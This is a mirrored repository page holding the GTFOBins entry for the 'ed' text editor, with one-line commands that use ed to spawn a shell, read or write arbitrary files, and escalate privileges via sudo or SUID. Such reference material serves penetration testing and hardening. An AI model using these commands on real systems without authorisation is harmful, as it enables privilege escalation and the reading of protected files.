1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00
GTFOBins.github.io/_gtfobins/ed.md
2021-01-18 09:41:36 +02:00

432 B

functions
shell file-write file-read suid sudo limited-suid
code
ed !/bin/sh
code
ed file_to_write a DATA . w q
code
ed file_to_read ,p q
code
./ed file_to_read ,p q
code
sudo ed !/bin/sh
code
./ed !/bin/sh